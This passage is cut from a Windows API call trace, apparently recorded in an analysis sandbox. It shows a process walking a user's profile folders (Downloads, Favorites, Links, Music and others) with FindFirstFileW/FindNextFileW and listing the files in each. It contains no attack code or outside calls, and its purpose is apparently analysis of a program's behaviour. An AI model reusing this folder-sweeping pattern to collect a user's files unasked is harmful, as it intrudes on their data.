hHeap=0xcd0000) returned 1 [0165.819] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0165.819] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.819] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0165.819] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.819] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.819] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.819] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.819] PathFindFileNameW (pszPath="") returned="" [0165.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0165.820] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0165.820] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0165.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.820] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.820] PathFindFileNameW (pszPath="") returned="" [0165.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0165.820] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0165.821] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0165.821] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.821] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0165.821] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.821] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.821] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.821] PathFindFileNameW (pszPath="") returned="" [0165.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0165.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0165.822] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0165.822] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.822] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.822] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0165.822] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.822] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.822] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.822] PathFindFileNameW (pszPath="") returned="" [0165.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0165.822] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.822] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0165.822] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.822] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.822] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.823] PathFindFileNameW (pszPath="") returned="" [0165.823] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd97f1340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd97f1340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd97f1340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd97f1340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cfe8d0, ftCreationTime.dwHighDateTime=0x1d5d8d4, ftLastAccessTime.dwLowDateTime=0xd49fe120, ftLastAccessTime.dwHighDateTime=0x1d5db72, ftLastWriteTime.dwLowDateTime=0xd49fe120, ftLastWriteTime.dwHighDateTime=0x1d5db72, nFileSizeHigh=0x0, nFileSizeLow=0x2b19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CsANIO3.m4a", cAlternateFileName="")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0xc7aff4c0, ftLastAccessTime.dwHighDateTime=0x1d5e2f5, ftLastWriteTime.dwLowDateTime=0xc7aff4c0, ftLastWriteTime.dwHighDateTime=0x1d5e2f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D99YKJDL-0LajD", cAlternateFileName="D99YKJ~1")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xe45dc290, ftLastAccessTime.dwHighDateTime=0x1d5e71f, ftLastWriteTime.dwLowDateTime=0xe45dc290, ftLastWriteTime.dwHighDateTime=0x1d5e71f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DENcIRfHVVVix5", cAlternateFileName="DENCIR~1")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HCQjXtcJ8s9B2R_", cAlternateFileName="HCQJXT~1")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6838050, ftCreationTime.dwHighDateTime=0x1d5d8d6, ftLastAccessTime.dwLowDateTime=0xd1021dd0, ftLastAccessTime.dwHighDateTime=0x1d5e1fd, ftLastWriteTime.dwLowDateTime=0xd1021dd0, ftLastWriteTime.dwHighDateTime=0x1d5e1fd, nFileSizeHigh=0x0, nFileSizeLow=0xfcf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kz0qvM tTpZbsG5.m4a", cAlternateFileName="KZ0QVM~1.M4A")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0xc6bc6380, ftLastAccessTime.dwHighDateTime=0x1d5e707, ftLastWriteTime.dwLowDateTime=0xc6bc6380, ftLastWriteTime.dwHighDateTime=0x1d5e707, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lf_1AfflQryz8itj s8w", cAlternateFileName="LF_1AF~1")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x10c570a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0x10c570a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LV2X09A0oM561", cAlternateFileName="LV2X09~1")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b74d2e0, ftCreationTime.dwHighDateTime=0x1d5e6c9, ftLastAccessTime.dwLowDateTime=0x46898190, ftLastAccessTime.dwHighDateTime=0x1d5dbe8, ftLastWriteTime.dwLowDateTime=0x46898190, ftLastWriteTime.dwHighDateTime=0x1d5dbe8, nFileSizeHigh=0x0, nFileSizeLow=0x7548, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oKSKm4Gv-RfTedCWj.wav", cAlternateFileName="OKSKM4~1.WAV")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e6320, ftCreationTime.dwHighDateTime=0x1d5e523, ftLastAccessTime.dwLowDateTime=0x54dba590, ftLastAccessTime.dwHighDateTime=0x1d5db82, ftLastWriteTime.dwLowDateTime=0x54dba590, ftLastWriteTime.dwHighDateTime=0x1d5db82, nFileSizeHigh=0x0, nFileSizeLow=0x3fea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yRwbkAy.m4a", cAlternateFileName="")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 1 [0165.823] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a", cAlternateFileName="")) returned 0 [0165.823] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.823] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.824] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0165.824] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.824] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.824] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.824] PathFindFileNameW (pszPath="") returned="" [0165.824] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 